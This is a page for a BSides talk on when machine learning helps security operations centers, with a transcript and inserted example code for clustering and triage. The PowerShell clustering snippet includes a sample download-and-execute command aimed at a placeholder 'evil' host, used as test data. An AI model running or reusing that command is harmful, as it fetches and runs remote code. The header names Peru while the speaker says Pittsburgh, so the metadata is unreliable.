
Clippy or SkyNet for your SOC? Machine Learning in Security Operations

BSides Peru · 2022 · 42:09 · Published 2022-09
Category: Technical
Style: Talk
About this talk
Preeti Ravindra examines when machine learning and analytics solve real security operations problems and when simpler rule-based approaches suffice. Drawing on experiments in decision support and threat detection, she maps solution complexity against guidance value, discusses failed ML projects in security, and outlines what teams need to successfully deploy data-driven security programs—including data architecture, cross-training, and realistic expectations.
Transcript [en]

Good evening everyone, and thank you for sticking around for this talk. I'm really excited to talk about "Clippy or Skynet for your security operations center." A little bit about me: I love solving security problems with data, and when I say that I don't mean just machine learning or fancy deep learning; I mean everything: rules, analytics, statistics, machine learning, and deep learning. So far I've delivered a number of analytics, AI, and ML solutions for both security vendors and enterprise security teams, so I've had the perspective from both sides. What I really like doing is helping security teams succeed in adopting data-driven approaches in their security operations center. I advocate for risk-driven security approaches: a lot of focus goes on threats, but I really like concentrating on the risks and on what makes sense to mitigate those risks. I'm also an inventor on three patents and still a novice open source contributor. Fun fact: I started my security journey in Pittsburgh, so I'm really happy to be speaking here at BSides Pittsburgh; I was at Carnegie Mellon and did my internship here. And of course I love dark themes, as is evident from my slides.

A quick show of hands: how many people here have dabbled with data science or statistics? Good, I have the right kind of audience. And how many people have actually implemented machine learning solutions in your security operations centers? Great, I definitely see one hand there, that's amazing. And was it successful? Okay, very cool. It's always good to know that people have at least tried to dabble and play with it. Maybe the other question makes more sense: how many people have seen failed machine learning projects? Great, okay, we have exactly the right kind of audience here.

I think everybody has seen this statistic: 85 percent of AI projects will fail through 2022. That prediction was made in 2018, and it has held up so far. It's not limited to security operations; it's across all domains, but the adversarial nature of our domain makes it even harder, and 90 percent fail before they're even started. One of the reasons they fail is that most of the time there is a mismatch between the problem we choose and the approach we choose to solve it. And just like any other learning curve, one thing I have found in my experience is that the moment you get your first machine learning solution working and deployed, it becomes much easier to deploy more solutions; you get a feel for what would work and what would not.

Today I'll talk about the experiments I have done in my career so far, all specific to security operations. The experiments are either decision-support related or threat-detection related. By decision support I mean using analytics and machine learning to drive operational efficiency and to help the analysts make a decision, as opposed to making the decision for them. I'll also touch briefly on the different kinds of solution complexity, why I thought one approach would work better than another and in what circumstances, then switch gears a bit to talk about what it takes to build a successful data science program, and finally wrap up with some takeaways: the good, the bad, and the ugly things I have seen.

Another interesting thing I wanted to touch on in this talk is return on investment. Security operations as a whole has multiple moving components, and one of them is the risk appetite of a given organization: what amount of risk are we willing to take, what amount are we not, how does that drive the bottom line for the operations, and what does it mean from a threat-efficacy perspective?

Coming back to the title of the talk, this is a slide where I have charted the complexity of the solutions against the guidance that different machine learning, analytics, or other data-driven solutions provide: guidance increases from left to right, and complexity increases from top to bottom. I also want to bring your attention to the images themselves. They were generated by a recent advancement in AI and machine learning called the DALL·E model, which takes a language prompt as input and generates an image. Of all the things we thought AI would replace, I never thought artists would be one of them, or meme creators; maybe our AIs will be creating memes as well. For the first image, the prompt I gave was "Clippy," and clearly it doesn't look like Clippy. The outline is there, but to me it looks more like a stethoscope with some missing components; it definitely doesn't look like Clippy. Then I gave it the prompt "Skynet," and that picture was at least related: it's a picture of the Terminator. I was expecting to see something else, like the Skynet logo from the Terminator franchise. If anybody wants to play around with these prompts, you can visit craiyon.com, where the DALL·E mini creators provide a hosted back end. One more fun fact from playing around: when I gave it "Skynet Helena Bonham Carter," it actually showed me a picture of Helena Bonham Carter as a cyborg. I thought that was funny, but I didn't want to put it here; it was an eyesore.

Coming back here, I'm kind of foreshadowing already: Clippy or Skynet. This DALL·E model is state of the art, with 16 billion parameters. Think about a straight line, a linear regression line: y = mx + c is just a couple of parameters, while this model has 16 billion. And despite having seen a lot of word-to-image translations, when I gave it "Clippy," this was the best it could come up with.

So let's talk about the usual suspects. I like to call them the usual suspects because you must have seen a lot of these in vendor talks. What are some of the most common applications where we could leverage data to solve problems in security operations? The first is threat detection, which is itself a huge umbrella: malware detection, outlier or user and entity behavior analytics, and, more recently, the trend of collecting micro-detections and chaining them into an attack sequence, because we all love the MITRE ATT&CK framework. The next family of data-driven solutions is decision support and operational efficiency. This is one of my personal favorites, because it helps drill down the actual volume of data and alerts that an analyst has to weed through, as opposed to just coming up with cooler and more detections, which may or may not be useful; there are some really interesting use cases around decision support. And then there are workflow improvements, which are typically about integrating all these data-driven solutions with the tool chain in a security operations center. A lot of playbooks can be automated, and all of these are data-driven approaches: you don't necessarily need fancy machine learning; you can just look at the statistics of previous dispositions and come up with some good workflow improvements.
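As an illustration of the last point, here is a minimal sketch of a disposition-driven workflow improvement: mine the history of how analysts closed past alerts and flag alert signatures that are almost always benign as candidates for an auto-close playbook. The field names and thresholds are made up for this example, not taken from the talk.

```python
from collections import Counter

def auto_close_candidates(dispositions, min_seen=50, benign_rate=0.98):
    """Given past (alert_signature, disposition) pairs, suggest signatures
    that have almost always been closed as benign, so a playbook could
    auto-close them instead of paging an analyst."""
    seen = Counter()
    benign = Counter()
    for signature, disposition in dispositions:
        seen[signature] += 1
        if disposition == "closed_benign":
            benign[signature] += 1
    return sorted(
        sig for sig, n in seen.items()
        if n >= min_seen and benign[sig] / n >= benign_rate
    )

# Toy history: one noisy signature seen 100 times, one rare escalation.
history = [("proxy_block_adware", "closed_benign")] * 99 + \
          [("proxy_block_adware", "escalated")] + \
          [("new_service_install", "escalated")] * 10
print(auto_close_candidates(history))  # ['proxy_block_adware']
```

Nothing here is machine learning; it is exactly the "statistics of previous dispositions" idea, and it is often a strong baseline to beat before reaching for a model.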

Game of Thrones fans will know trial by combat and trial by fire. I think I have done the trial by fire, which is mostly diving deep into a lot of these experiments and sometimes coming out unscathed, sometimes being burnt. I'll briefly touch on each of these quadrants. The first quadrant is threat detection, and I'll cover some of the experiments I did there at a very high level. Then I'll touch on how we automate some of the most common triage processes; earlier today Aaron and another gentleman were talking about how many alerts and events somebody has to go through, so I'll definitely talk about how we tackle some of those triage processes. The third one is presenting the right kind of evidence. This is the critical part, and I don't think many of us have gotten it right yet. Most of the time I see incident responders constantly trying to get the right kind of data at the moment they need to make a decision, and not having that information. That is what analytics, or any data-driven solution, should address: provide the right incident-response evidence, and provide it in a timely way. And there's a common decision-support theme running through all of this, so I'll cover that as well.

All right, the first one: the threat detection aspect. Yes, another eyesore of a slide, but it's pretty old. This is a very simple obfuscation script from when I was beginning my career, around 2016 or 2017, when exploit kits were all the rage for initial access and for delivering ransomware payloads. Exploit kits would typically break or escape the browser sandbox and try to launch malware, and most often that led to ransomware.

The first image here is an obfuscated script, and the second image is what it looks like deobfuscated. I was doing a lot of this manually, and obviously nobody likes doing a lot of manual vulnerability research or exploit development. Sure, I understand what the exploit looks like and what the obfuscation looks like, but it's really hard to catch all of these things with very specific rules, especially when they change all the time in very slight ways: for example, the string you can see next to the script around the fifth line of the first image might be changed into a different kind of string next time, and that makes it a little difficult to catch. Exploit kits may be gone now, but I can assure you that very similar tactics are still being used, especially when it comes to phishing and to a lot of PowerShell and other script obfuscation; obfuscation is a fairly common technique.

So what were the experiments? I think it's really critical to bring it down to a simple hypothesis or problem statement, and the problem statement here was: is this obfuscated or not? In terms of gathering the data, we gathered a lot of benign data and malicious data as well. We gathered malicious landing pages, all fortunately labeled, which is a boon and typically does not happen in the security space, and we also gathered some full PCAPs, just to see what we could extract from them and how that could augment our models. The modeling was a supervised approach, because that was the first way to start and we had the luxury of label data; again, it was a luxury, so we were really happy to have it. The challenge we had was what we call class imbalance in machine learning: a lot of data of one particular type, which tends to be benign, and a very small amount of malicious samples, because the base rate of malware or malicious activity is less than one percent. In fact, I'd go out on a limb and say it's around 0.05 percent. We had different approaches to address this. We tried to generate data, because machine learning models typically do well only when they see balanced samples: equal samples of cat and equal samples of dog, and they work brilliantly; in security they don't, because of this class imbalance problem. For false positive reduction we did not use a machine learning approach at all: we used standard software engineering algorithms that helped us reduce the false positives, and a lot of domain knowledge went into identifying what a potentially malicious landing page could look like. In a way it's very similar to spam or not-spam, because that's the kind of dataset we're all used to, and the kind of dataset that made us think we could do more machine learning in security.

So if you're keeping score, the score here is Clippy one, Skynet zero, because we chose a very simple, traditional supervised machine learning model and augmented it with basic traditional algorithms. Why were we successful? Because the hypothesis was simple and specific (it's really important to get that), and because the data was labeled and in the order of millions. Coming back to the other quadrant on my slide: how do we provide the most relevant information to a SOC analyst who is triaging incidents, and how do we automate that process?
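Before the next quadrant, a quick aside on what "simple and specific" can look like in practice. The "is this obfuscated or not" framing usually starts from crude lexical features; the ones below (character entropy, punctuation density, longest token) are illustrative guesses, not the features from the talk's experiment, and a real system would feed them into an imbalance-aware classifier rather than compare them by hand.

```python
import math
from collections import Counter

def script_features(script: str) -> dict:
    """Crude features that tend to separate obfuscated from plain scripts:
    character-level entropy, fraction of non-alphanumeric characters,
    and the length of the longest whitespace-delimited token."""
    counts = Counter(script)
    n = len(script)
    entropy = -sum(c / n * math.log2(c / n) for c in counts.values())
    non_alnum = sum(1 for ch in script if not ch.isalnum() and not ch.isspace()) / n
    longest = max((len(tok) for tok in script.split()), default=0)
    return {"entropy": entropy, "non_alnum": non_alnum, "longest_token": longest}

plain = "var total = price * quantity; alert(total);"
obfus = "eval(String.fromCharCode(118,97,114)+'x3f\\x41'+unescape('%75%6e'))"

# The obfuscated sample is noticeably denser in punctuation and escapes.
print(script_features(plain))
print(script_features(obfus))
```

With labels in the millions, as in the experiment above, even a plain logistic regression over features like these, with class weights to compensate for the roughly 0.05 percent base rate, is a reasonable first model.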

Even here, the automation was a data-mining approach, which has been around since the invention of search engines. We mined information from different logs and event telemetry, and we also used statistical approaches based on the rules and the past searches that the analysts doing triage had run. That was one way we gathered or mined all the locally available information. There were also other things we could extract from logs with very traditional computer programming: what was blocked, whether canary files were changed, whether a process actually ran. This is still a data-driven approach, because you're using the statistical aspects, not necessarily machine learning or deep learning.

And this is where the machine learning and deep learning component comes in. This was a bit of a moonshot idea: let's take this to another level. We have a lot of information available as structured data, in databases and from CISA or DHS bulletins, and a lot of local telemetry that is also completely structured. But a lot of the time SOC analysts also go look up blog articles; they read a lot of unstructured data. So we thought, let's take it one step further and automate that as well. What you can see here is a blog I saved during the WannaCry attacks. We implemented a machine learning model that could extract what I call security entities, things that look like security words such as "EternalBlue" or "SMB exploit," along with timestamps and the relationships between them, all in an automated way using natural language processing.

As one successful example, you can see that on June 27, 2017, the Petya ransomware may have been spreading via the EternalBlue exploit that was used in the WannaCry attack from the previous month, and we wanted to present that as evidence. The entities explicitly provided in the blog article make sense; they are directly extracted using natural language processing. But there are interesting statements like "Petya ransomware may be spreading by the EternalBlue exploit used in the WannaCry attack from last month," and if you look at the timestamp we attach, it actually goes back one month for the appropriate security entity and relationship. This is named entity recognition, a standard procedure, but it was very interesting because this is one of the few cases where it worked, and it felt like leveraging it could make the automated triage process much more efficient; doing it manually seemed like a huge operational burden.

How did we do this? We annotated a lot of blog articles, we did statistical modeling based on expectation maximization, and we also tried deep learning, which was mostly used to generate summaries. I'm not sure if people here are familiar, but GPT-3 is one of those recent OpenAI models that can generate a summary from a dialogue or a body of text, so we tried some of these approaches to see if they could help. One of the challenges we faced was evaluating the efficacy of the information extraction, and it was very complicated. The BLEU score is the standard everybody uses: it compares what the machine learning model extracted against what a human annotated. We definitely used the BLEU score, but from a domain perspective evaluation was very challenging, because we did not know how to define success for the outcome: should we consider it a success if the model extracted everything from a given document, or only if it extracted it from exactly the sentence the human annotated? So we had to come up with a bunch of custom evaluations as well.

With all of this we had an interesting approach to extracting information from unstructured data, and the score now is... sorry, Clippy has already won, my bad: Skynet minus one. And in this case Clippy got a zero, because the traditional statistical models did not do well at all; the model we really thought would do very well at extracting entities and relationships was not efficient for that purpose. However, the deep learning model was really good at generating summaries, so I give it plus 0.5 just for that: if you're an analyst and you just want a quick glimpse into what the alert looked like, reading that summary works great. So for this particular instance the simpler models did not work, the more complicated models were asking beyond the state of the art at that point, and we got a good summary, so plus 0.5 for that.

As you can see on the slide, it is difficult for the model to disambiguate. These language models are huge and trained on Wikipedia articles and textbooks, so it was difficult for the model to tell Winnie the Pooh's honeypot from the honeypot found in a security blog. That was a real challenge, and of course, from an operational perspective, there's the amount of engineering needed to bring in these large models, and the cost, which is obviously one of the biggest considerations in a security operations center: how much would it cost to train these models and maintain them?

Those are engineering aspects I'm not even touching in this talk, but they are definitely a consideration, along with questions like: is it really adding value, is the value incremental, is it worth it, can't we just solve this with a simpler solution, can we just do regex? I think all of those are valid here.

Now we're coming to the part where I want to talk more about improving operational efficiency. This is an example where we can actually help with threat hunting by whittling down the data. Here we're trying to hunt for malicious PowerShell commands in an ocean of PowerShell commands, and this was an unsupervised approach, slightly different from everything we've seen so far, which was supervised. The challenge here was that no analyst will go and label a PowerShell command and say this was a malicious PowerShell command that ran; nobody does that. So we did not have a lot of label data, but the unsupervised machine learning approaches we used were still very relevant, especially clustering. What it did was cluster a lot of similar-looking PowerShell commands, and the pattern that emerged was clusters of PowerShell commands that you would typically expect to see in your network and in your environment. Again, knowledge of what you have, of what you would consider normal in your environment, becomes critical. But this can definitely help someone in threat hunting: once the PowerShell commands get clustered, you can see that some clusters are completely legitimate, things you would expect to see, and some are simply not. A lot of this is really helpful for pivoting when you're threat hunting, as well as for reducing the amount of data.
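To make the clustering idea concrete, here is a toy sketch, not the system from the talk: a greedy token-overlap clustering of command lines. A real pipeline would more likely use TF-IDF vectors with k-means or DBSCAN; the commands, tokenizer, and threshold below are all illustrative.

```python
def tokenize(cmd: str) -> set:
    """Lowercase a command line and split it into a set of tokens."""
    return set(cmd.lower().replace("-", " ").split())

def cluster_commands(commands, threshold=0.5):
    """Greedy single-pass clustering: put a command into the first cluster
    whose representative shares enough tokens (Jaccard similarity),
    otherwise start a new cluster."""
    clusters = []  # list of (representative_tokens, [commands])
    for cmd in commands:
        toks = tokenize(cmd)
        for rep, members in clusters:
            if len(toks & rep) / len(toks | rep) >= threshold:
                members.append(cmd)
                break
        else:
            clusters.append((toks, [cmd]))
    return [members for _, members in clusters]

cmds = [
    "Get-ChildItem -Path C:\\Users",
    "Get-ChildItem -Path C:\\Temp",
    "IEX (New-Object Net.WebClient).DownloadString('http://evil/ps1')",
]
# The two routine directory listings cluster together; the download
# cradle ends up alone, which is exactly what a hunter wants to see.
for group in cluster_commands(cmds):
    print(group)
```

Small, odd clusters like the last one are the natural pivot points for a hunt, while large homogeneous clusters of expected commands can be set aside, which is the data-reduction effect described above.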

The other one I think everybody has heard of at least once, because everybody talks about alert fatigue for the SOC analyst, and everybody would like to bubble down the low-priority alerts. For this experiment we had alert data with labels, alerts from different vendors and different data types, and we used both supervised and semi-supervised machine learning. The challenges here were, again, the lack of label data, and identifying drift in priority: for example, today a particular alert type with a particular event is high priority, but three months down the line it is not, and a lot of that boils down to policies and risk that are very specific to a given organization.

So how do we typically solve these problems? When we don't have labeled data, we try to get proxy label data, and we get those labels from the actions in the workflows that the SOC analysts take. If in the end they close the alert, or if the SOC analyst says this is something I escalated further, then it's perhaps investigation-worthy, perhaps something that needs to be bubbled up and not down. Those are some of the proxy labels we could get. Another challenge was: how does the model remember? Is it memorizing what the analyst is saying, or is it actually objectively telling us whether something is a threat or a priority? That's a very difficult question to answer. Most current models learn from the humans, so they can only do as well as the humans do, and to go beyond that there need to be other ways of approaching the problem. Another interesting part here was that we tried a lot of gamification to get labels.
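The proxy-labeling idea above can be sketched in a few lines. The action names and rules here are hypothetical stand-ins for whatever a given ticketing system records, not the scheme used in the talk's experiment.

```python
def proxy_label(ticket_events):
    """Derive a training label for an alert from what the analyst
    actually did with it, since nobody hand-labels alerts:
    escalation => worth investigating, clean close => probably noise.
    Returns None when the history is ambiguous."""
    actions = {e["action"] for e in ticket_events}
    if "escalated" in actions or "incident_created" in actions:
        return 1  # investigation-worthy
    if "closed" in actions and "reopened" not in actions:
        return 0  # noise / low priority
    return None   # skip ambiguous tickets in training

print(proxy_label([{"action": "acknowledged"}, {"action": "escalated"}]))  # 1
print(proxy_label([{"action": "closed"}]))                                 # 0
print(proxy_label([{"action": "closed"}, {"action": "reopened"}]))         # None
```

Because these labels only reflect what analysts did, a model trained on them inherits their judgment, and their mistakes, which is exactly the memorization concern raised above.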

We had some interesting pop-ups, things like "you're only 10 points away," similar to Uber's rider levels, as part of the gamification experience for the SOC analysts. For both the PowerShell clustering and the alert prioritization, the models we used were very simple, traditional machine learning models, no deep learning, so Clippy gets two again, and Skynet gets minus 0.5 here, because we did try one of those word embedding models commonly used in deep learning, where you train the model on which things are similar and it provides a score. This was very interesting: take the similarity of "virus detected" and "virus blocked." Their semantics are completely different: "virus detected" means you have detected it, and "virus blocked" means you have detected it and blocked it, so the action somebody would take is completely different. And in this case it was very interesting to see that the model gave the exact same similarity, so it probably did not learn much.

So now let's shift gears a bit. We saw that most of the time Clippy is good enough for the use cases we're currently targeting, so what do we really need to successfully deploy any data-driven solution for security? Obviously, the people. One thing I've noticed when interviewing others, and when reading job requisitions, is one set of descriptions where the requirement for a data scientist is: security knowledge is a bonus, you need to know how to engineer and mine large-scale data, and you need to write production code. The other set of descriptions I've seen says: you need to do data science, plus support the product management and customer success teams to figure out how much these models are being adopted. It's a huge ask. I'd like to borrow a line from Joshua Neil of Securonix: build full-stack teams, not full-stack data scientists. It's extremely difficult to become a full-stack data scientist.

Another aspect: if you are looking to start a security machine learning program, a statistician or an ML engineer shouldn't be your first hire. Your first hire should be a data architect who can work with the security teams to identify exactly what kinds of datasets need to be curated and how to govern those datasets. Those are things we really need to look into. Then cross-train your statisticians and security practitioners. I can give you an example: while training one of these models, the data scientists, as part of the feature engineering process, completely omitted the IP address, basically gave it a wildcard, and modeled everything else. If a security professional had been there advising the data scientists, they would have immediately said this will not work: this is exactly the kind of loophole an attacker would leverage to change the decision of the model. So try to cross-train.

And then processes; I cannot emphasize this enough. In a lot of places I've been, the first thing I get asked is: we want you to build the machine learning model that will help us catch APT28. I think we're far away from that; building a machine learning model that catches APT28 right off the bat is not a realistic ask. So definitely try to work with your security teams, work with your leaders, and set expectations.

If you are an enterprise security team, try to use the data you already have, and leverage your existing workflows and processes for data-driven approaches instead of starting new tools and new processes. Another point I've noticed in a lot of data science teams is that they are sometimes forced to fit into an agile framework. That works in software engineering, because you know the kind of problem you want to solve and what kind of solution there is, so you can work that way. But with data science, people say, I want to solve this problem, I want to catch APT29, and maybe your data does not support it: you cannot really catch APT29. Or, I want to do user behavior analytics, I want to detect insider threats. You have to look at and explore the data first, and set expectations only after that.

From a technology perspective, one thing that's often overlooked is MLOps practices: how do we harden the systems, how do we make them robust? And data scientists often forget their baselines. They go for the moonshots, let's use the latest cutting edge, but we totally forget our baselines: can we really improve on them, whether they are rules-based or statistics-based?

Lastly, the good, the bad, and the ugly, summarizing everything I've mentioned. The good: more mature security teams and data science teams actually work together and try to find that problem-and-solution match, that fit; and Occam's razor actually works, so start with the simplest problem for which you have the data. There are some really cool advancements happening, so the security community should keep an eye on everything going on in the AI and machine learning space. Maybe now is not the right time to bring those into production, because they're definitely not battle-ready or battle-tested, but there is a lot of interesting work going on, and with a lot of research, proper development, and the right guidance, there is a lot of potential in these advanced machine learning and deep learning models. Another thought: in general we're always focused on finding the threat, which is the needle, and we really don't have that magnet. So maybe the approach should be to eliminate all the noise instead: remove the haystack, and the needle will automatically reveal itself. Maybe we have the tools to get at the haystack, not the needle, so let's remove the haystack.

The bad: the return on investment is inversely proportional to the model complexity, and this is an engineering challenge that needs more resources. Most folks are interested in trying to build the latest models and not quite as interested in getting the engineering effort in place, so that's definitely one thing. And there are mismatched expectations: everybody wants to work on the latest and greatest, but very few things actually work, so it's really hard to retain data scientists who can work in security; they all want to go build recommendation engines and generate ads so people can click on them. The other bad thing, and one of my pet peeves: again, let's focus on hardening.

The ugly: there's not a lot of open research. I wish the community did more open research, shared more datasets, shared more code; that way we can all test each other's models and determine what is actually valuable, what can be improved, and how it can be improved. There needs to be more of a push toward open-sourcing the models as well as the datasets within the security community. That's it for me, and I think now is the time for questions, if any.

Sorry, the question was: do we see adversaries using machine learning? Great question. Yes, adversarial machine learning is a whole space in itself, and something I definitely did not touch on today; I only spoke about the defensive aspect. Adversarial machine learning covers a lot of different kinds of attacks. Most prominently in the news, you see autonomous cars misreading signs because the machine learning decision boundaries are different. You also see data poisoning, where somebody poisons the data the model is trained on, poisoning it at the initial stage, which is akin to the supply chain attacks we see.

Can we detect it? There are a couple of tools being developed, mostly for data scientists to make their models more robust so they don't get attacked this way; we're trying to be more proactive there. In terms of detection, it's really difficult to say whether something looks like a normal request to a machine learning model hosted in the cloud: you can just send an API call and get a response, and it's really difficult to know whether somebody is actually trying to trick the model. Traditional detection approaches would apply here as well: look at the rate at which they request predictions, and look at the kind of data points they request them for. Are the points very close to each other? Because that's when you can infer that they are trying to infer the decision boundary of the model. Does that answer your question?
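The rate-and-proximity heuristic just described can be sketched very roughly. Everything below (the score formula, thresholds, and two-feature query vectors) is invented for illustration; real model-extraction detection is considerably more involved.

```python
import math

def probing_score(queries, rate_limit=100, distance_floor=0.05):
    """Rough heuristic for spotting possible model-extraction probing
    against a hosted prediction API: many requests whose feature vectors
    sit unusually close together suggest someone walking the decision
    boundary. Returns a score in [0, 1]."""
    n = len(queries)
    if n < 2:
        return 0.0
    # Mean pairwise Euclidean distance between query feature vectors.
    total, pairs = 0.0, 0
    for i in range(n):
        for j in range(i + 1, n):
            total += math.dist(queries[i], queries[j])
            pairs += 1
    mean_dist = total / pairs
    rate_factor = min(1.0, n / rate_limit)      # more requests, more suspicion
    closeness = 1.0 if mean_dist < distance_floor else distance_floor / mean_dist
    return rate_factor * closeness

normal = [(0.1, 0.9), (0.8, 0.2), (0.5, 0.5)]          # spread-out queries
probe  = [(0.500, 0.500), (0.501, 0.500), (0.500, 0.501)]  # tightly bunched
print(probing_score(probe) > probing_score(normal))  # True
```

The point is only that both signals mentioned in the answer, request rate and how tightly the requested points cluster, can be combined into a simple monitorable score on the serving side.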

Any other questions? [Applause]